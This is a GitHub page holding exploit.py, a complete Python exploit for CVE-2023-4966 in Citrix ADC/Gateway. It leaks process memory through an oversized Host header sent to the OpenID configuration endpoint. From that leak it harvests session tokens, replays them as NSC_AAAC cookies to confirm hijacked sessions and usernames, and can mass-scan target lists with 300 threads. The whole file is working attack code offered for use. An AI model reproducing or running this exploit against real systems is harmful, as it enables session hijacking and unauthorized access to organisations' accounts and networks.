-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathexploit.py
163 lines (136 loc) · 7.25 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
import re
import sys
import hexdump
import argparse
import requests
from rich.console import Console
from urllib.parse import urlparse
from alive_progress import alive_bar
from typing import List, Tuple, Optional, TextIO
from concurrent.futures import ThreadPoolExecutor, as_completed
# Alias for the urllib3 package that ships inside `requests`.
# NOTE(review): this module-level name is spelled like the standard-library
# `warnings` module; that module is not imported in the visible file, but the
# name would shadow it if it ever were.
warnings = requests.packages.urllib3
# Silence urllib3's InsecureRequestWarning; the HTTP calls in this file pass
# verify=False, which would otherwise emit that warning on each request.
warnings.disable_warnings(warnings.exceptions.InsecureRequestWarning)
class CitrixMemoryDumper:
    """Command-line checker that reports endpoints affected by CVE-2023-4966.

    The instance parses its own command-line arguments on construction,
    collects ``(header, message)`` tuples in ``self.results`` while targets
    are processed, and prints them through a ``rich`` console (optionally
    mirroring the message text to an output file).

    NOTE(review): the source this class was recovered from had lost its
    indentation; block nesting below was reconstructed from syntax and the
    wording of the messages. Confirm against the upstream file.
    """

    # Overlapping (lookahead) matches for runs of lowercase hex characters.
    _TOKEN_65_PATTERN = re.compile(rb'(?=([a-f0-9]{65}))')
    _TOKEN_32_PATTERN = re.compile(rb'(?=([a-f0-9]{32}))')
    # A 65-character candidate is only kept when it ends with this suffix.
    _TOKEN_65_SUFFIX = b'45525d5f4f58455e445a4a42'

    def __init__(self):
        """Build the console and argument parser, parse argv, open the output file.

        Side effects: reads ``sys.argv`` via ``argparse`` and, when ``--output``
        is given, opens that path for writing (closed again by :meth:`run`).
        """
        self.console = Console()
        self.parser = argparse.ArgumentParser(description='Citrix ADC Memory Dumper')
        self.setup_arguments()
        self.results: List[Tuple[str, str]] = []
        self.output_file: Optional[TextIO] = None
        if self.args.output:
            # Explicit UTF-8 so that response text which the locale encoding
            # cannot represent does not abort the run with UnicodeEncodeError.
            self.output_file = open(self.args.output, 'w', encoding='utf-8')

    def setup_arguments(self) -> None:
        """Register the command-line options and store the parsed result in ``self.args``."""
        self.parser.add_argument('-u', '--url', help='The Citrix ADC / Gateway target (e.g., https://192.168.1.200)')
        self.parser.add_argument('-f', '--file', help='File containing a list of target URLs (one URL per line)')
        self.parser.add_argument('-o', '--output', help='File to save the output results')
        self.parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose mode')
        self.parser.add_argument('--only-valid', action='store_true', help='Only show results with valid sessions')
        self.args = self.parser.parse_args()

    def print_results(self, header: str, result: str) -> None:
        """Print one result line and mirror its message to the output file.

        Args:
            header: Rich-markup prefix such as ``[bold green][+][/bold green]``.
            result: Message text; only this part is written to the output file.

        With ``--only-valid`` set, anything whose header lacks ``[+]`` is dropped.
        """
        if self.args.only_valid and "[+]" not in header:
            return
        formatted_msg = f"{header} {result}"
        self.console.print(formatted_msg, style="white")
        if self.output_file:
            self.output_file.write(result + '\n')

    def normalize_url(self, url: str) -> str:
        """Reduce a target string to ``scheme://netloc``.

        Surrounding whitespace is stripped and the scheme check is
        case-insensitive, so ``HTTPS://host/path`` is recognised as already
        having a scheme instead of being prefixed a second time. Inputs
        without an http/https scheme default to ``https://``.

        Args:
            url: Host, host:port, or full URL.

        Returns:
            The URL with path, query and fragment removed.
        """
        url = url.strip()
        if not url.lower().startswith(("http://", "https://")):
            url = f"https://{url}"
        parsed_url = urlparse(url)
        return f"{parsed_url.scheme}://{parsed_url.netloc}"

    def dump_memory(self, url: str) -> None:
        """Query one target and append the findings to ``self.results``.

        Sends a GET for the OpenID configuration document with an oversized
        ``Host`` header, then inspects the response body. Nothing is returned;
        every outcome is recorded as a ``(header, message)`` tuple.

        Args:
            url: Target as given by the user; normalised before use.
        """
        full_url = self.normalize_url(url)
        headers = {
            "Host": "a" * 24576
        }
        try:
            r = requests.get(
                f"{full_url}/oauth/idp/.well-known/openid-configuration",
                headers=headers,
                verify=False,
                timeout=10,
            )
            content_bytes = r.content
            if r.status_code == 200 and content_bytes:
                if b"\x00" * 16 in content_bytes:
                    # Strip the echoed filler; repeated because removing one
                    # run can join neighbouring fragments into a new run.
                    for _ in range(10):
                        content_bytes = content_bytes.replace(b'a'*65, b'').replace(b'a'*32, b'')
                    if self.args.verbose and self.args.url:
                        self.results.append(("[bold blue][*][/bold blue]", f"Memory Dump for {full_url}"))
                        hex_output = hexdump.hexdump(content_bytes, result='return').strip()
                        self.results.extend([("", line) for line in hex_output.splitlines()])
                        self.results.append(("[bold blue][*][/bold blue]", "End of Dump\n"))
                    session_tokens = self.find_session_tokens(content_bytes)
                    valid_token_found = False
                    # Deliberately no early exit: every candidate is checked so
                    # that each accepted one is recorded by test_session_cookie.
                    for token in session_tokens:
                        if self.test_session_cookie(full_url, token):
                            valid_token_found = True
                    if not valid_token_found:
                        if not self.args.only_valid:
                            if self.args.url:
                                self.results.append(("[bold yellow][!][/bold yellow]", f"Partial memory dump but no valid session token found for {full_url}."))
                            else:
                                self.results.append(("[bold green][+][/bold green]", f"Vulnerable to CVE-2023-4966. Endpoint: {full_url}, but no valid session token found."))
            # NOTE(review): this branch is assumed to pair with the status/body
            # check above (indentation was lost in the source) - confirm.
            elif self.args.verbose and self.args.url:
                self.results.append(("[bold red][-][/bold red]", f"Could not dump memory for {full_url}."))
        except Exception as e:
            # Best-effort per target: a failure on one endpoint must not stop
            # the others; it is only reported in verbose single-URL mode.
            if self.args.verbose and self.args.url:
                self.results.append(("[bold red][-][/bold red]", f"Error processing {full_url}: {str(e)}."))

    def clean_bytes(self, data: bytes) -> bytes:
        """Return ``data`` with every byte outside printable ASCII (32..126) removed."""
        return bytes(x for x in data if 32 <= x <= 126)

    def find_session_tokens(self, content_bytes: bytes) -> List[str]:
        """Extract candidate hex strings from a response body.

        Matching is overlapping (lookahead), so a hex run longer than the
        target length yields one candidate per starting offset.

        Args:
            content_bytes: Raw response body.

        Returns:
            De-duplicated candidates in first-seen order: 65-character ones
            (which must end with the fixed suffix) followed by 32-character
            ones. Candidates consisting only of the filler character ``a``
            are excluded.
        """
        sessions_65 = [
            match.group(1).decode('utf-8')
            for match in self._TOKEN_65_PATTERN.finditer(content_bytes)
            if match.group(1).endswith(self._TOKEN_65_SUFFIX)
            and not match.group(1).startswith(b'a'*65)
        ]
        sessions_32 = [
            match.group(1).decode('utf-8')
            for match in self._TOKEN_32_PATTERN.finditer(content_bytes)
            if not match.group(1).startswith(b'a'*32)
        ]
        # dict.fromkeys keeps insertion order while dropping duplicates.
        return list(dict.fromkeys(sessions_65 + sessions_32))

    def test_session_cookie(self, url: str, session_token: str) -> bool:
        """Check whether the endpoint accepts ``session_token`` as a session cookie.

        Args:
            url: Normalised ``scheme://netloc`` of the target.
            session_token: Candidate value for the ``NSC_AAAC`` cookie.

        Returns:
            True when the response is a single-line HTTP 200 body, in which
            case a result tuple is also appended; False otherwise, including
            on any request error.
        """
        headers = {
            "Cookie": f"NSC_AAAC={session_token}"
        }
        try:
            r = requests.post(
                f"{url}/logon/LogonPoint/Authentication/GetUserName",
                headers=headers,
                verify=False,
                timeout=10,
            )
            # A multi-line body is not treated as a user name.
            if r.text.count('\n') > 0:
                return False
            if r.status_code == 200:
                username = r.text.strip()
                self.results.append(("[bold green][+][/bold green]", f"Vulnerable to CVE-2023-4966. Endpoint: {url}, Cookie: {session_token}, Username: {username}"))
                return True
            else:
                return False
        except Exception as e:
            # Best-effort: report only in verbose single-URL mode.
            if self.args.verbose and self.args.url:
                self.results.append(("[bold red][-][/bold red]", f"Error testing cookie for {url}: {str(e)}."))
            return False

    def _drain_results(self) -> None:
        """Print and remove queued results one item at a time.

        Worker threads append to ``self.results`` concurrently. Popping single
        items (instead of iterating and then calling ``clear()``) means an
        entry appended mid-drain is never discarded unprinted.
        """
        while self.results:
            header, result = self.results.pop(0)
            self.print_results(header, result)

    def run(self) -> None:
        """Process the single URL or the URL list file, then close the output file.

        Exits with status 1 when neither ``--url`` nor ``--file`` was given.
        The output file is closed on every exit path, including that one.
        """
        try:
            if self.args.url:
                self.dump_memory(self.args.url)
                for header, result in self.results:
                    self.print_results(header, result)
            elif self.args.file:
                with open(self.args.file, 'r') as file:
                    # Skip blank lines so they are not turned into empty targets.
                    urls = [line.strip() for line in file if line.strip()]
                with ThreadPoolExecutor(max_workers=300) as executor, alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
                    futures = [executor.submit(self.dump_memory, url) for url in urls]
                    for _ in as_completed(futures):
                        self._drain_results()
                        bar()
            else:
                self.console.print("[bold red][-][/bold red] URL or File must be provided.", style="white")
                sys.exit(1)
        finally:
            if self.output_file:
                self.output_file.close()
                self.output_file = None
# Script entry point: construct the tool (which parses argv) and run it.
if __name__ == "__main__":
    CitrixMemoryDumper().run()